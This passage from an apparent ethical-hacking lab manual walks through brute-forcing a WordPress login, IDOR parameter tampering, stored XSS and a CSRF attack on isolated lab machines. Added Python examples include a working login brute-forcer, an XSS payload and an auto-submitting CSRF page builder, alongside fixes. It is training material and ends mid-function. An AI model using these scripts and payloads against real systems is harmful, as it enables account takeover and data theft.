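    src_scheme, _, src_host = source.rpartition("://")
    if src_scheme and src_scheme != scheme:
        return False
    if src_host.startswith("*."):                  # wildcard subdomain
        return host.endswith(src_host[1:])
    return host == src_host


def frameable_by(headers: dict[str, str], page_origin: str, framing_origin: str) -> bool:
    """True if a page served with `headers` at `page_origin` can be framed by `framing_origin`.

    Precedence follows the CSP specification: when frame-ancestors is present it
    governs and X-Frame-Options is ignored; otherwise X-Frame-Options applies;
    with neither, any site may frame the page, which is what the iframe test shows.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    ancestors = _csp_frame_ancestors(lower.get("content-security-policy", ""))
    if ancestors is not None:
        for src in ancestors:
            if src == "none":
                return False
            if src == "self":
                if framing_origin == page_origin:
                    return True
            elif _origin_matches(src, framing_origin):
                return True
        return False
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framing_origin == page_origin
    return True  # no protection, or a value browsers do not honour


# Constructed samples: the origins under test and four header configurations.
SITE = "http://www.moviescope.com"
THIRD_PARTY = "http://third-party.example"

UNPROTECTED = {"Content-Type": "text/html"}
XFO_SAMEORIGIN = {"X-Frame-Options": "SAMEORIGIN"}
HARDENED = {
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
}
PARTNER_ALLOWED = {"Content-Security-Policy": "frame-ancestors 'self' https://*.partner.example"}


def audit(headers: dict[str, str]) -> dict[str, bool]:
    """Summarise who can frame a page served with these headers."""
    return {
        "any_site_can_frame": frameable_by(headers, SITE, THIRD_PARTY),
        "same_origin_can_frame": frameable_by(headers, SITE, SITE),
    }


if __name__ == "__main__":
    for name, hdrs in (("unprotected", UNPROTECTED), ("xfo", XFO_SAMEORIGIN),
                       ("hardened", HARDENED), ("partner", PARTNER_ALLOWED)):
        print(name, audit(hdrs))
```

HARDENED carries both headers on purpose: frame-ancestors is what modern browsers enforce, and X-Frame-Options: DENY covers older ones that do not understand the directive.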

Lab 2: Perform Web Application Attacks

Lab Scenario

For an ethical hacker or pen tester, the next step after gathering required information
about the target web application is to attack the web application. They must have the
required knowledge to perform web application attacks to test the target network’s web
application security infrastructure.

Attackers perform web application attacks with certain goals in mind. These goals may be either technical or non-technical. For example, attackers may breach the security of the web application and steal sensitive information for financial gain or for curiosity’s sake. To hack the web app, first, the attacker analyzes it to determine its vulnerable areas. Next, they map its “attack surface,” the set of entry points (parameters, forms, cookies, APIs) through which they can reach the application. Even if the target web application only has a single vulnerability, attackers will try to compromise its security by launching an appropriate attack. They try various application-level attacks such as injection, XSS, broken authentication, broken access control, security misconfiguration, and insecure deserialization to compromise the security of web applications to commit fraud or steal sensitive information.
An ethical hacker or pen tester must test their company’s web application against
various attacks and other vulnerabilities. They must find various ways to extend the
security test and analyze web applications, for which they employ multiple testing
techniques. This will help in predicting the effectiveness of additional security measures
in strengthening and protecting web applications in the organization.

The tasks in this lab will assist in performing attacks on web applications using various
techniques and tools.

Lab Objectives

 Perform a brute-force attack using Burp Suite
 Perform parameter tampering using Burp Suite
 Exploit parameter tampering and XSS vulnerabilities in web applications
 Perform cross-site request forgery (CSRF) attack
 Enumerate and hack a web application using WPScan and Metasploit
 Exploit a remote command execution vulnerability to compromise a target web server
 Exploit a file upload vulnerability at different security levels
 Gain backdoor access via a web shell using Weevely

Overview of Web Application Attacks

Web applications are built, maintained and accessed through several layers: custom application code, third-party components, databases, web servers, OSes, networks, and the security controls around them. The mechanisms or services employed at each layer help the user in one way or another to access the web application securely. Organizations treat web application security as a critical component, because web applications are a major entry point for attacks. Attackers exploit vulnerabilities at any of these layers to gain unrestricted access to the application or the entire network, trying various application-level attacks to compromise the security of web applications to commit fraud or steal sensitive information.

Task 1: Perform a Brute-force Attack using Burp Suite


Burp Suite is an integrated platform for performing security testing of web applications.
It has various tools that work together to support the entire testing process from the
initial mapping and analysis of an application’s attack surface to finding and exploiting
security vulnerabilities. Burp Suite contains key components such as an intercepting
proxy, application-aware spider, advanced web application scanner, intruder tool,
repeater tool, and sequencer tool.

Here, we will perform a brute-force attack on the target website using Burp Suite.

In this task, the target WordPress website (http://10.10.10.16:8080/CEH) is hosted by the victim machine, Windows Server 2016. Keep this machine running until the end of the task. Here, the host machine is the Parrot Security machine.
1. Click Parrot Security to switch to the Parrot Security machine.
2. Click the Firefox icon from the top section of Desktop to launch
the Mozilla Firefox browser.

3. The Mozilla Firefox window appears; type http://10.10.10.16:8080/CEH/wp-login.php? into the address bar and press Enter.

Here, we will perform a brute-force attack on the designated WordPress website hosted by the Windows Server 2016 machine.

4. Now, we shall set up a Burp Suite proxy by first configuring the proxy
settings of the browser.

5. In the Mozilla Firefox browser, click the Open menu icon in the right
corner of the menu bar and select Preferences from the list.
6. The General settings tab appears. In the Find in Preferences search
bar, type proxy, and press Enter.

7. The Search Results appear. Click the Settings button under the Network Settings option.
8. The Connection Settings window appears; select the Manual proxy configuration radio button and specify the HTTP Proxy as 127.0.0.1 and the Port as 8080. Tick the Use this proxy server for all protocols checkbox and click OK. Close the Preferences tab.
9. Now, minimize the browser window, click the Applications menu from the top left corner of Desktop, and navigate to Pentesting --> Web Application Analysis --> Web Application Proxies --> burpsuite to launch the Burp Suite application.
10. A security pop-up appears, enter the password as toor in
the Password field and click OK.
11. In the next Burp Suite Community Edition notification, click OK.
12. In the Terms and Conditions wizard, click the I Accept button.

If Delete old temporary files? pop-up appears, click Delete.


13. The Burp Suite main window appears; ensure that the Temporary
project radio button is selected and click the Next button, as shown in the
screenshot.

If an update window appears, click Close.


14. In the next window, select the Use Burp defaults radio-button and click
the Start Burp button.
15. The Burp Suite main window appears; click the Proxy tab from the
available options in the top section of the window.
16. In the Proxy settings, by default, the Intercept tab opens-up. Observe
that by default, the interception is active as the button says Intercept is on.
Leave it running.

Turn the interception on if it is off.


17. Switch back to the browser window. On the login page of the target
WordPress website, type random credentials, here admin and password.
Click the Log In button.

You can enter the credentials of your choice here.


18. Switch back to the Burp Suite window; observe that the HTTP request
was intercepted by the application.

19. Now, right-click anywhere on the HTTP request window, and from the
context menu, click Send to Intruder.

Observe that Burp Suite intercepted the entered login credentials.


If you do not get the request as shown in the screenshot, then press
the Forward button.
20. Now, click on the Intruder tab from the toolbar and observe that under
the Intruder tab, the Target tab appears by default.

21. Observe the target host and port values in the Host and Port fields.
22. Click on the Positions tab under the Intruder tab and observe that Burp
Suite sets the target positions by default, as shown in the HTTP request. Click
the Clear § button from the right-pane to clear the default payload values.
23. Once you clear the default payload values, select Cluster bomb from
the Attack type drop-down list.

Cluster bomb uses multiple payload sets. There is a different payload set for
each defined position (up to a maximum of 20). The attack iterates through
each payload set in turn so that all permutations of payload combinations
are tested. For example, if there are two payload positions, the attack will
place the first payload from payload set 2 into position 2 and iterate through
all payloads in payload set 1 in position 1; it will then place the second
payload from payload set 2 into position 2 and iterate through all the
payloads in payload set 1 in position 1.
24. Now, we will set the username and password as the payload values. To
do so, select the username value entered in Step 17 and click Add § from
the left-pane.

25. Similarly, select the password value entered in Step 17 and click Add
§ from the left-pane.

Here, the username and password are admin and password.


26. Once the username and password payloads are added, the symbol ‘§’ appears at the start and end of each selected payload value. Here, as the screenshot shows, the values are admin and password.
27. Navigate to the Payloads tab under the Intruder tab and ensure that
under the Payload Sets section, the Payload set is selected as 1, and
the Payload type is selected as Simple list.

28. Under the Payload Options [Simple list] section, click the Load… button.
29. A file selection window appears; navigate to the
location /home/attacker/Desktop/CEHv11 Module 14 Hacking Web
Applications/Wordlist, select the username.txt file, and click
the Open button.
30. Observe that the selected username.txt file content appears under
the Payload Options [Simple list] section, as shown in the screenshot.
31. Similarly, load a password file for the payload set 2. To do so, under the
Payload Sets section, select the Payload set as 2 from the drop-down
options and ensure that the Payload type is selected as Simple list.

32. Under the Payload Options [Simple list] section, click the Load… button.
33. A file selection window appears; navigate to the
location /home/attacker/Desktop/CEHv11 Module 14 Hacking Web
Applications/Wordlist, select the password.txt file, and click
the Open button.
34. Observe that selected password.txt file content appears under
the Payload Options [Simple list] section, as shown in the screenshot.
35. Once the wordlist files are selected as payload values, click the Start
attack button to launch the attack.
36. A Burp Intruder notification appears. Click OK to proceed.
37. The Intruder attack 1 window appears as the brute-force attack starts. It displays each username-password combination along with the Length of the response and the Status.

38. Wait for the progress bar at the bottom of the window to complete.
39. After the progress bar completes, scroll down and observe the different values of Status and Length. Here, Status=302 and Length=1105.

A failed WordPress login re-renders the login form with an error (Status 200 and a constant Length); a successful login redirects to the dashboard (Status 302 with a much shorter body). The one combination whose Status and Length differ from all the others is therefore the valid credential pair.
The values might differ in your lab environment.
40. In the Raw tab under the Request tab, the HTTP request with a set of
the correct credentials is displayed. (here, username=admin and
password=qwerty@123), as shown in the screenshot. Note down these user
credentials.
41. Now, that you have obtained the correct user credentials, close
the Intruder attack 1 window.

If a Warning pop-up appears, click OK.


42. Navigate back to the Proxy tab and click the Intercept is on button to
turn off the interception. The Intercept is on button toggles to Intercept is
off, indicating that the interception is off.
43. Switch to the browser window and perform Steps 5-7. Remove the
browser proxy set up in Step 8, by selecting the No proxy radio-button in
the Connection Settings window and click OK. Close the tab.
44. Reload the target website http://10.10.10.16:8080/CEH/wp-login.php?, enter the Username and Password obtained in Step 40 and click Log In.

Here, the username and password are admin and qwerty@123.


If a pop-up appears, click Resend.
45. You are successfully logged in using the brute-forced credentials.
The Welcome to WordPress! Page appears, as shown in the screenshot.
46. This concludes the demonstration of how to perform a brute-force attack
using Burp Suite.

47. Close all open windows and document all the acquired information.
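What Intruder does in Steps 23 to 39 (iterate every username against every password, then pick out the response that does not look like the others) is small enough to script. The following is an added example, not code from the lab or from Burp Suite: cluster_bomb() performs the cluster-bomb iteration, find_outliers() applies the status/length comparison of Step 39, and make_http_sender() is a real stdlib sender that POSTs the field names WordPress's wp-login.php uses (log, pwd, wp-submit, testcookie) without following redirects. The login URL in its docstring is hypothetical usage; the offline fake_wp_login() and both wordlists are constructed so the example runs without the lab machines.

```python
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from itertools import product

# Added example (not part of the lab): the cluster-bomb iteration Burp Intruder
# performs, plus the "odd one out" check on (status, length) that step 39 does
# by eye. The offline sender and wordlists below are constructed.


def cluster_bomb(usernames, passwords, send):
    """Try every (username, password) pair and return {(u, p): (status, length)}."""
    return {(u, p): send(u, p) for u, p in product(usernames, passwords)}


def find_outliers(results):
    """Credentials whose response differs from the most common response.

    A failed WordPress login re-renders the form (200, constant length); a
    successful one redirects (302) with a much shorter body, so it stands out.
    """
    baseline, _ = Counter(results.values()).most_common(1)[0]
    return sorted(creds for creds, sig in results.items() if sig != baseline)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 302s as errors instead of following them, like Burp does."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def make_http_sender(login_url):
    """Return send(u, p) -> (status, body_length) that POSTs to wp-login.php.

    Hypothetical usage: send = make_http_sender("http://10.10.10.16:8080/CEH/wp-login.php")
    """
    opener = urllib.request.build_opener(_NoRedirect)

    def send(username, password):
        data = urllib.parse.urlencode({
            "log": username, "pwd": password,
            "wp-submit": "Log In", "testcookie": "1",
        }).encode()
        req = urllib.request.Request(login_url, data=data, method="POST")
        # WordPress rejects logins that do not carry its test cookie.
        req.add_header("Cookie", "wordpress_test_cookie=WP%20Cookie%20check")
        try:
            with opener.open(req, timeout=10) as resp:
                return resp.status, len(resp.read())
        except urllib.error.HTTPError as err:
            return err.code, len(err.read())

    return send


# Constructed stand-in for the lab server: only admin / qwerty@123 succeeds.
def fake_wp_login(username, password):
    if (username, password) == ("admin", "qwerty@123"):
        return 302, 1105        # redirect to wp-admin, short body
    return 200, 4071            # login form with an error message


USERNAMES = ["root", "admin", "user"]                 # constructed wordlists
PASSWORDS = ["password", "123456", "qwerty@123", "admin"]

if __name__ == "__main__":
    results = cluster_bomb(USERNAMES, PASSWORDS, fake_wp_login)
    print(f"{len(results)} requests sent")
    for user, pwd in find_outliers(results):
        print(f"candidate: {user}:{pwd} -> {results[(user, pwd)]}")
```

If the failure page reflects the submitted username, its length will vary and the baseline should be taken on status alone; also bear in mind that an unthrottled cluster bomb against a site with lockout protection will lock the account rather than crack it.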

Task 2: Perform Parameter Tampering using Burp Suite


A web parameter tampering attack involves the manipulation of parameters exchanged
between the client and server to modify application data such as user credentials and
permissions, price, and quantity of products.

Here, we will use the Burp Suite tool to perform parameter tampering.

In this task, the target website (www.moviescope.com) is hosted by the victim machine, Windows Server 2019. Here, the host machine is the Parrot Security machine.
1. On the Parrot Security machine, click the Firefox icon from the top section of Desktop to launch the Mozilla Firefox browser.
2. The Mozilla Firefox window appears; type http://www.moviescope.com into the address bar and press Enter.

3. Now, set up a Burp Suite proxy by first configuring the proxy settings of
the browser.

4. In the Mozilla Firefox browser, click the Open menu icon in the right
corner of the menu bar and select Preferences from the list.
5. The General settings tab appears. In the Find in Preferences search
bar, type proxy, and press Enter.

6. The Search Results appear. Click the Settings button under the Network Settings option.
7. A Connection Settings window appears. Select the Manual proxy configuration radio button, specify the HTTP Proxy as 127.0.0.1 and the Port as 8080 (the Burp Suite listener, as in Task 1), tick the Use this proxy server for all protocols checkbox and click OK. Close the Preferences tab.
8. Now, minimize the browser window, click the Applications menu from the top left corner of Desktop, and navigate to Pentesting --> Web Application Analysis --> Web Application Proxies --> burpsuite to launch the Burp Suite application.
9. A security pop-up appears, enter the password as toor in
the Password field and click OK.
10. In the next Burp Suite Community Edition notification, click OK.
11. Burp Suite initializes. If a Burp Suite Community Edition notification
saying An update is available appears, click Close.

12. The Burp Suite main window appears; ensure that the Temporary
project radio button is selected and click the Next button, as shown in the
screenshot.

If an update window appears, click Close.


13. In the next window, select the Use Burp defaults radio-button and click
the Start Burp button.
14. The Burp Suite main window appears; click the Proxy tab from the
available options in the top section of the window.
15. In the Proxy settings, by default, the Intercept tab opens-up. Observe
that by default, the interception is active as the button says Intercept is on.
Leave it running.

Turn the interception on if it is off.


16. Switch back to the browser window, and on the login page of the target
website (www.moviescope.com), enter the credentials sam and test.
Click the Log In button.

Here, we are logging in as a registered user on the website.


17. Switch back to the Burp Suite window and observe that the HTTP
request was intercepted by the application.

You can observe that the entered login credentials were intercepted by the
Burp Suite.
18. Now, keep clicking the Forward button until you are logged into the user
account.
19. Switch to the browser, and observe that you are now logged into the user
account, as shown in the screenshot.

20. Now, click the View Profile tab from the menu bar to view the user
information.
21. After clicking the View Profile tab, switch back to the Burp
Suite window and keep clicking the Forward button until you get the HTTP
request, as shown in the screenshot.

22. Now, navigate to the Params tab under the Intercept tab to view the
captured parameters.
23. Under the Params tab, observe a table with captured values such
as URL and Cookie.

24. In the row of type URL with the name id, double-click the Value column to change it from 1 to 2, as shown in the screenshot.
25. After changing the value, navigate back to the Raw tab.
26. In the Raw tab, click the Intercept is on button to turn off the
interception.
27. After switching off the interception, navigate back to the browser window
and observe that the user account associated with ID=2 appears with the
name John, as shown in the screenshot.

Although we logged in as sam (ID=1), by tampering with the id parameter in Burp Suite we obtained information about other user accounts. The application trusts the client-supplied id without checking that it belongs to the logged-in user, an insecure direct object reference (IDOR).
28. Similarly, you can edit the id parameter in Burp Suite with any random
numeric value to view information about other user accounts.

29. Switch to the browser window and perform Steps 4-6. Remove the
browser proxy set up in Step 7, by selecting the No proxy radio-button in
the Connection Settings window and click OK. Close the tab.
30. This concludes the demonstration of how to perform parameter
tampering using Burp Suite.

31. Close all open windows and document all the acquired information.
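The id rewrite done by hand in Step 24 and the missing server-side check behind it can both be shown in a few lines. The following is an added example, not code from the lab or from the MovieScope application: tamper_query() rewrites one query parameter the way the Params tab does, view_profile_vulnerable() and view_profile_fixed() are a constructed profile handler with and without an ownership check, and idor_probe() walks candidate ids with one session and reports which other users' records come back. The user table reuses the ids and names the task shows (sam, john, kety, steve); the profile path viewprofile.aspx is a hypothetical placeholder.

```python
from urllib.parse import urlencode, urlsplit, urlunsplit, parse_qsl

# Added example (not part of the lab): the id rewrite Burp's Params tab does by
# hand, a vulnerable profile handler next to a fixed one, and a probe that walks
# candidate ids with one session. The user table and path are constructed.

USERS = {1: {"name": "sam"}, 2: {"name": "john"},
         3: {"name": "kety"}, 4: {"name": "steve"}}


def tamper_query(url, param, value):
    """Return url with one query parameter replaced (e.g. id=1 -> id=2)."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query[param] = str(value)
    return urlunsplit(parts._replace(query=urlencode(query)))


def view_profile_vulnerable(session_user_id, requested_id):
    """Looks up whatever id the client supplied: an insecure direct object reference."""
    return USERS.get(requested_id)


def view_profile_fixed(session_user_id, requested_id):
    """Authorise first: a user may only read their own record."""
    if requested_id != session_user_id:
        raise PermissionError("id does not belong to the logged-in user")
    return USERS.get(requested_id)


def idor_probe(handler, session_user_id, candidate_ids):
    """Ids of other users whose records the handler returns to this session."""
    leaked = []
    for cid in candidate_ids:
        if cid == session_user_id:
            continue
        try:
            record = handler(session_user_id, cid)
        except PermissionError:
            continue
        if record is not None:
            leaked.append(cid)
    return leaked


if __name__ == "__main__":
    # Hypothetical profile URL; the real MovieScope path is not shown in the lab.
    print(tamper_query("http://www.moviescope.com/viewprofile.aspx?id=1", "id", 2))
    print("vulnerable leaks:", idor_probe(view_profile_vulnerable, 1, range(1, 11)))
    print("fixed leaks:     ", idor_probe(view_profile_fixed, 1, range(1, 11)))
```

The fix is an authorization check at the point of use, not input validation: the tampered id is a perfectly well-formed integer, so validating its format would not stop the attack.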

Task 3: Exploit Parameter Tampering and XSS Vulnerabilities in Web Applications
Parameter tampering is a simple form of attack aimed directly at an application’s
business logic. A parameter tampering attack exploits vulnerabilities in integrity and
logic validation mechanisms that may result in XSS or SQL injection exploitation.

XSS attacks exploit vulnerabilities in dynamically generated web pages, which enables
malicious attackers to inject client-side script into web pages viewed by other users.
Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash code for
execution on a victim’s system by hiding it within legitimate requests.
Although strict input and parameter validation, applied consistently across the application, can minimize parameter tampering and XSS vulnerabilities, many websites and web applications are still vulnerable to these security threats.

Attacking web applications through parameter tampering and XSS vulnerabilities is one
of the steps an attacker takes in attempting to compromise a web application’s security.
An expert ethical hacker and pen tester should be aware of the different parameter
tampering and XSS methods that can be employed by an attacker to hack web
applications.

Here, we will learn how to exploit parameter tampering and XSS vulnerabilities in the
target web application.

In this task, the target website (www.moviescope.com) is hosted by the victim machine Windows Server 2019. Here, the host machine is the Windows 10 machine.
1. Click Windows 10 to switch to the Windows 10 machine.
2. Launch any browser (in this lab, Mozilla Firefox). In the address bar of the browser, type http://www.moviescope.com and press Enter.

3. The MovieScope website appears. In the Login form, type Username and Password as steve and password, and click Login.

Here, we are logging in as a registered user on the website.


4. You are logged into the website. Click the View Profile tab from the
menu bar.

5. You will be redirected to the profile page, which displays the personal
information of steve (here, you). You will observe that the value of ID in the
personal information and address bar is 4.
6. Now, try to change the parameter in the address bar to id=1 and
press Enter.

7. You will be redirected to the profile of sam without having to perform any
hacking techniques to explore the database. Here, you can observe Sam’s
personal information under the View Profile tab, as shown in the
screenshot.
8. Now, try the parameter id=3 in the address bar and press Enter.

9. You get the profile for kety. This way, you can change the id number and
obtain profile information for different users.

This process of changing the ID value and getting the result is known as
parameter tampering. Web XSS attacks exploit vulnerabilities on dynamically
generated web pages. This enables malicious attackers to inject client-side
scripts into the web pages viewed by other users.
10. Now, click the Contacts tab. Here you will be performing an XSS attack.
11. The Contacts page appears; enter your name or any random name
(here, steve) in the Name field; enter the cross-site script as shown in the
screenshot in the Comment field and click the Submit Comment button.

12. On this page, you are testing for XSS vulnerability. Now, refresh
the Contacts page.

If a notification appears saying To display this page, Firefox must send information…, click the Resend button.
13. You have successfully added a malicious script to this page. The
comment with the malicious link is stored on the server.

14. Click Windows Server 2019 to switch to the Windows Server 2019 machine. Press Ctrl+Alt+Delete to activate the machine. By default, the Administrator account is selected; type Pa$$w0rd as the password and press Enter.
15. Launch any browser (in this lab, Google Chrome). In the address bar of the browser, type http://www.moviescope.com and press Enter.

16. The MovieScope website appears. In the Login form, type the Username and Password as sam and test and click Login.

Here, we are logging in as the victim.


17. You are logged into the website as a legitimate user. Click
the Contacts tab from the menu bar.
18. As soon as you click the Contacts tab, the server returns the stored comment unencoded as part of the page, and the victim’s browser executes the injected script: a pop-up appears, stating You are hacked.

19. Similarly, whenever any user visits the Contacts page, the alert pops up as soon as the page loads, because the payload is stored on the server (stored XSS) rather than reflected from a single request.

20. This concludes the demonstration of how to exploit parameter tampering and XSS vulnerabilities in web applications.

21. Close all open windows and document all the acquired information.
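The Contacts page stores the comment and later writes it into the page without output encoding; that is the whole defect. The following is an added example, not code from the lab or from MovieScope: a constructed comment list rendered once the vulnerable way and once with html.escape() applied at output time, plus a parser-based check that counts the <script> elements and on* event-handler attributes a browser would actually parse, so the result does not depend on a naive string search. The payload text reuses the "You are hacked" alert from the task; the second payload and the page skeleton are constructed.

```python
import html
from html.parser import HTMLParser

# Added example (not part of the lab): stored comments rendered without and
# with output encoding, and a parser-based check for active markup. The
# comments and page skeleton are constructed.

PAYLOAD = '<script>alert("You are hacked")</script>'


class _ScriptFinder(HTMLParser):
    """Counts <script> start tags and on* attributes the parser encounters."""

    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.event_handlers = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        self.event_handlers += sum(1 for name, _ in attrs if name.startswith("on"))


def count_active_markup(page):
    """Number of <script> elements plus on* handlers a browser would parse."""
    finder = _ScriptFinder()
    finder.feed(page)
    return finder.scripts + finder.event_handlers


def render_comments_vulnerable(comments):
    """Interpolates stored input straight into HTML: stored XSS."""
    items = "".join(f"<li><b>{name}</b>: {text}</li>" for name, text in comments)
    return f"<html><body><ul>{items}</ul></body></html>"


def render_comments_fixed(comments):
    """HTML-encodes every stored value at output time."""
    items = "".join(
        f"<li><b>{html.escape(name)}</b>: {html.escape(text)}</li>"
        for name, text in comments
    )
    return f"<html><body><ul>{items}</ul></body></html>"


# Constructed stored comments: one benign, two payloads of different shapes.
COMMENTS = [("alice", "Great site"), ("steve", PAYLOAD),
            ("mallory", '<img src=x onerror="alert(1)">')]

if __name__ == "__main__":
    print("vulnerable:", count_active_markup(render_comments_vulnerable(COMMENTS)))
    print("fixed:     ", count_active_markup(render_comments_fixed(COMMENTS)))
```

Encoding belongs at the output stage for the context the data lands in (here an HTML text node); stripping "<script>" on input misses the img/onerror form in the third comment and every other tag that carries an event handler.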

Task 4: Perform Cross-site Request Forgery (CSRF) Attack


CSRF, also known as a one-click attack, occurs when a hacker instructs a user’s web
browser to send a request to the vulnerable website through a malicious web page.
Financial websites commonly contain CSRF vulnerabilities. Usually, outside attackers
cannot access corporate intranets, so CSRF is one of the methods used to enter these
networks. The inability of web applications to differentiate a request made using
malicious code from a genuine request exposes it to the CSRF attack. These attacks
exploit web page vulnerabilities that allow an attacker to force an unsuspecting user’s
browser to send malicious requests that they did not intend.
CSRF attacks can be performed using various techniques and tools. Here, we will use WPScan to identify a plugin with a known CSRF vulnerability on the target site and then exploit it with a crafted HTML page opened in the victim’s authenticated browser.

In this task, the target WordPress website (http://10.10.10.16:8080/CEH) is hosted by the victim machine Windows Server 2016. Here, the host machine is the Parrot Security machine.
1. Click Windows Server 2016 to switch to the Windows Server 2016 machine.

2. Press Ctrl+Alt+Delete to activate the machine. By default, the CEH\Administrator account is selected; type Pa$$w0rd as the password and press Enter.
3. Now, in the right corner of Desktop, click the Show hidden icons icon,
observe that the WampServer icon appears.

4. Wait for this icon to turn green, which indicates that the WampServer is
successfully running.
5. Now, open any web browser (here, Mozilla Firefox). In the address bar, type http://10.10.10.16:8080/CEH/wp-login.php? and press Enter.

Here, we are opening the above-mentioned website as the victim.


6. A WordPress webpage appears. Type Username or Email
Address and Password as admin and qwerty@123. Click the Log
In button.
7. Assume that you, as the site administrator, have installed and configured a plugin (here, leenk.me) for this site and want to check its settings.

8. Hover your mouse cursor on Plugins in the left pane and click Installed
Plugins, as shown in the screenshot.
9. In the Plugins page, observe that leenk.me is installed.
Click Activate under the leenk.me plugin to activate the plugin.
10. Refresh the page and you will observe that the leenk.me plugin option
appears in the left pane; click it.

Refresh the page if leenk.me does not appear on the left pane.
11. The leenk.me General Settings page appears. Tick
the Facebook checkbox in the Choose which social network modules
you want to enable for this site option under the Administrator
Options section and click the Save Settings button.

12. The leenk.me General Settings page appears, as shown in the screenshot. Ensure that under the Administrator Options section, the Facebook checkbox is selected in the Choose which social network modules you want to enable for this site option and click the Facebook Settings hyperlink.

13. A Facebook Settings page appears; under Message Settings, enter the details below:

o Default Message: This is CEH lab.
o Default Link Name: CEH.com
o Default Caption: CEH Labs

14. Clear the Default Description text field. Leave the other settings to default and click the Save Settings button to save the settings.
15. Click Parrot Security to switch to the Parrot Security machine.
16. Click the Applications icon from the top section of Desktop and
navigate to Internet --> Google Chrome browser.
17. The Google Chrome window appears.
Type https://wpscan.com/register into the address bar and press Enter.

18. A webpage with a Register new user form appears; scroll down and in the Required fields enter your personal details. Tick the By ticking this box you agree to our terms checkbox.
19. Now, scroll down to the end of the page, click I'm not a robot and click the Register button.

If the browser offers to save this login, decline (Don’t Save).
If a captcha window appears, verify it.
20. A notification saying A message with a confirmation link has been
sent to your email address….

21. Now, open a new tab in the Chrome browser and open the email account
you gave while registering as a new user in Step 18.

22. Once you are logged into your email account, open the email
from noreply@wpvulndb.com, and in the email, click the Confirm my
account hyperlink.

If you get any error while accessing website content in Parrot Security
machine, then browse the same website in your local machine, login into
your account and perform the following steps.
23. A new webpage appears with a message saying Your email address
has been successfully confirmed. Enter the same details in the Email
Address and Password fields that you provided in Step 18.

If a Would you like Firefox to save this login notification appears at the
top of the browser window, click Don’t Save.
24. You get signed in successfully in the website. Now, click the Free
usage button under the Choose a plan section.
25. The Edit Profile page appears; in the API Token section and observe
the API Token. Note down or copy this API Token; we will use this token in
the later steps.
26. Close the Google Chrome browser window.

27. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.
28. A Parrot Terminal window appears. In the terminal window, type sudo
su and press Enter to run the programs as a root user.

29. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.


30. Now, type cd and press Enter to jump to the root directory.
31. In the Terminal window, type wpscan --api-token [API Token from Step#25] --url http://10.10.10.16:8080/CEH --plugins-detection aggressive --enumerate vp and press Enter.

--enumerate vp: specifies the enumeration of vulnerable plugins.


32. The result appears, displaying detailed information regarding the target
website.
33. Scroll down to the Plugin(s) Identified section, and observe the
installed vulnerable plugins (akismet and leenkme) on the target website.

34. In this task, we will exploit the CSRF vulnerability present in the leenkme plugin.
35. Minimize the Terminal window. Click the Places menu at the top
of Desktop and click Desktop from the drop-down options.
36. The Desktop window appears; copy the Security_Script.html file.
37. Click the Places menu at the top of Desktop and click Network from
the drop-down options.
38. The Network window appears; press the Ctrl+L keys. A Location field
appears; type smb://10.10.10.10 and press Enter to access the Windows
10 shared folders.
39. A security pop-up appears; enter the Windows 10 machine credentials
(Username: Admin and Password: Pa$$w0rd) and click Connect.
40. The Windows shares on 10.10.10.10 window appears; double-click
the CEH-Tools folder.
41. Navigate to CEHv11 Module 14 Hacking Web Applications and
paste Security_Script.html script.
42. Click Windows Server 2016 to switch to the Windows Server 2016 machine. Press Ctrl+Alt+Delete to activate the machine. By default, the CEH\Administrator account is selected; type Pa$$w0rd as the password and press Enter.
43. Navigate to the location Z:\CEHv11 Module 14 Hacking Web
Applications (shared network drive), copy the Security_Script.html file,
and paste it onto Desktop.
44. Right-click the Security_Script.html file and navigate to Open with --> Firefox.

You should use the same browser that was used in Step 5, so that the forged request carries the victim’s logged-in WordPress session cookie.
45. The Security_Script.html file opens up in the Mozilla Firefox browser,
along with a pop-up; click OK to continue.
46. You will be redirected to the Facebook Settings page of
the leenk.me plugin page. Observe that the field values have been
changed, indicating a successful CSRF attack on the website, as shown in the
screenshot.

47. This concludes the demonstration of how to perform a CSRF attack on a target website.

48. Close all open windows on both the machines (Window Server
2016 and Parrot Security) and document all the acquired information.
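Security_Script.html works only because the browser attaches the admin’s WordPress session cookie to a request the admin never intended, and because the plugin’s settings handler accepts that request without any proof that it originated from its own page. The following is an added example, not the lab’s Security_Script.html and not the plugin’s code: csrf_poc_page() builds an auto-submitting cross-site form of the kind such a script is assumed to be, and issue_csrf_token()/save_settings() show the synchronizer-token check that defeats it. The settings URL, field names and forged values are hypothetical; the two default values reuse those entered in Step 13.

```python
import hmac
import secrets
from html import escape

# Added example (not part of the lab): an auto-submitting cross-site form of the
# kind Security_Script.html is assumed to be, and the synchronizer-token check
# that stops it. Endpoint, field names and values below are hypothetical.

SETTINGS_URL = "http://10.10.10.16:8080/CEH/wp-admin/admin.php?page=leenkme"  # hypothetical
FORGED_FIELDS = {"default_message": "Pwned by CSRF", "default_caption": "Not CEH Labs"}


def csrf_poc_page(action_url, fields):
    """Return HTML that POSTs `fields` to `action_url` as soon as it loads.
    The victim's browser attaches its session cookie automatically."""
    inputs = "".join(
        f'<input type="hidden" name="{escape(k, quote=True)}" value="{escape(v, quote=True)}">'
        for k, v in fields.items()
    )
    return (
        "<!doctype html><html><body>"
        f'<form id="f" method="post" action="{escape(action_url, quote=True)}">{inputs}</form>'
        "<script>document.getElementById('f').submit();</script>"
        "</body></html>"
    )


def issue_csrf_token(session):
    """Store a fresh random token in the server-side session and return it;
    the legitimate settings page embeds it as a hidden field."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def save_settings(session, form, settings):
    """Apply `form` to `settings` only when the token matches the session's.
    Raises PermissionError for a missing or wrong token (the CSRF case)."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
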